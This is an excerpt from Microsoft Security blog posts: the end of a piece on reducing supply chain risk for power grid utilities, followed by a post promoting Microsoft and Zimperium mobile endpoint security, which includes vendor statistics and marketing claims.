Power grids are interconnected systems of generating plants, wires, transformers, and substations. Regional electrical companies work together to efficiently balance the supply and demand for electricity across the nation. These same organizations have also come together to protect the grid from attack. As an industry, working through organizations like the Edison Electric Institute (EEI), utilities can define security standards and hold manufacturers accountable to those requirements.

It may also be useful to work with The Federal Energy Regulatory Committee (FERC), The North American Electric Reliability Corporation (NERC), or The United States Nuclear Regulatory Commission (U.S. NRC) to better regulate the security requirements of products manufactured for the electrical grid.

Apply extra scrutiny to IoT devices

As you purchase and deploy IoT devices, prioritize security. Be careful about purchasing products from countries that are motivated to infiltrate critical infrastructure. Conduct penetration tests against all new IoT and IIoT devices before you connect them to the network. When you place sensors on the grid, you’ll need to protect them from both cyberattacks and physical attacks. Make them hard to reach and tamper-proof.

Collaborate on solutions

Reducing the risk of a destabilizing power grid attack will require everyone in the utility industry to play a role. By working with manufacturers, trade organizations, and governments, electricity organizations can lead the effort to improve security across the industry. For utilities in the United States, several public-private programs are in place to enhance the utility industry capabilities to defend its infrastructure and respond to threats:

Read Part 1 in the series: “Defending the power grid against cyberattacks

Read “Defending the power grid against supply chain attacks: Part 2 – Securing hardware and software

Read how Microsoft Threat Protection can help you better secure your endpoints.

Learn how MSRC developed an incident response plan

Bookmark the Security blog to keep up with our expert coverage on security matters. For more information about our security solutions visit our website. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Defending the power grid against supply chain attacks: Part 3 – Risk management strategies for the utilities industry appeared first on Microsoft Security.

Mobile security—the 60 percent problem

April 7th, 2020 No comments

Off the top of your head, what percentage of endpoints in your organization are currently protected?

Something in the 98 percent+ range?

Most enterprises would say having fewer than 2 percent of endpoint devices lacking adequate security would be considered good given the various changes, updates, etc. However, enterprises have traditionally focused security and compliance efforts on traditional computing devices (for example, servers, desktops, and laptops), which represent just 40 percent of the relevant endpoints. The remaining 60 percent of endpoints are mobile devices and are woefully under-protected. That’s a problem.

Mobile security is more important than ever

Mobile devices, both corporate-owned and bring your own device (BYOD), are now the dominant productivity platform in any enterprise organization, with more than 80 percent of daily work performed on a mobile device. These devices operate extensively outside of corporate firewalls, in the hands of users who may not prioritize precautions like vetting Wi-Fi networks or keeping their devices patched and updated. Mobile often represents a wandering corporate data repository.

These factors combine to cause headaches for security teams because, in short, mobile security has a significant gap in most organizations’ endpoint protection strategies.

The lack of protection for (and visibility into) these endpoints introduces significant risk and compliance concerns that show no sign of slowing down. Here are some statistics from Zimperium’s State of Enterprise Mobile Security Report, 2019, which contains data from more than 45 million anonymized endpoints from enterprises in a variety of industries and both local and national government agencies from around the world:

  • Mobile OS vendors created patches for 1,161 security vulnerabilities in 2019.
  • At the end of 2019, 48 percent of iOS devices were more than four versions behind the latest OS version and 58 percent of Android devices were more than two versions behind.
  • Twenty-four percent of enterprise mobile endpoints were exposed to device threats, not including outdated operating systems.
  • Nineteen percent of enterprise mobile endpoints experienced network-based attacks.
  • Sixty-eight percent of malicious profiles were considered “high-risk,” meaning they had elevated access that could lead to data exfiltration or full compromise.

Microsoft and Zimperium deliver comprehensive mobile security

The combination of Microsoft’s management and security solutions and Zimperium’s unique on-device mobile device security delivers unequaled protection for managed and unmanaged BYOD devices. Together, Microsoft and Zimperium have delivered numerous innovations for customers in areas such as:

An endpoint is an endpoint is an endpoint, and they all must be protected

Organizations now realize mobile devices are an unprotected endpoint with possible access to or containing the information of a traditional endpoint. And while there are some overlaps in what you protect—email, calendars, etc.—the way you solve the traditional endpoint security problem is completely different than how you solve the mobile security problem.

So, what does all this really mean for an enterprise?

For a joint Microsoft and Zimperium international banking customer with employees in nine countries using 17,000 corporate and BYOD mobile devices, it means knowing that you are protected with Microsoft Endpoint Manager on Azure. It means knowing how many of your employees are putting your enterprise at risk with outdated iOS versions and high-risk profiles. It means having the ability to remediate and monitor your endpoints with one console. Our customer is in control of its infrastructure choices versus having the vendor forcing a solution. In addition, both iOS and Android platforms are supported and protected. If a user were to switch from one device to another that runs a different OS, the person would simply re-download the Zimperium app and activate.

Once deployed, the solution is capable of simultaneously integrating with unified endpoint solutions (UEM) solutions from multiple vendors. In other words, part of the organization, or specified users, can be managed with one UEM solution, and part of it by another. For joint Zimperium and Microsoft customers, this capability simplifies the migration from a third-party UEM to Microsoft Endpoint Manager while maintaining security during the migration. Zimperium provides visibility and security across the mobile infrastructure for customers who may have multiple UEM solutions deployed.

About Zimperium

Zimperium, the global leader in mobile device and app security, offers real-time, on-device protection against Android and iOS threats. The Zimperium platform leverages our award-winning machine-learning-based engine—z9—to protect mobile data, apps, and sessions against device compromises, network attacks, phishing attempts, and malicious apps.

To date, z9 has detected 100 percent of zero-day device exploits without requiring an update or suffering from the delays and limitations of cloud-based detection—something no other mobile security provider can claim.

Get a free enterprise trial

Interested in trying Zimperium in your Microsoft security environment? Contact us today for mobile device security with protection against network, device, phishing, and malicious app attacks.

The post Mobile security—the 60 percent problem appeared first on Microsoft Security.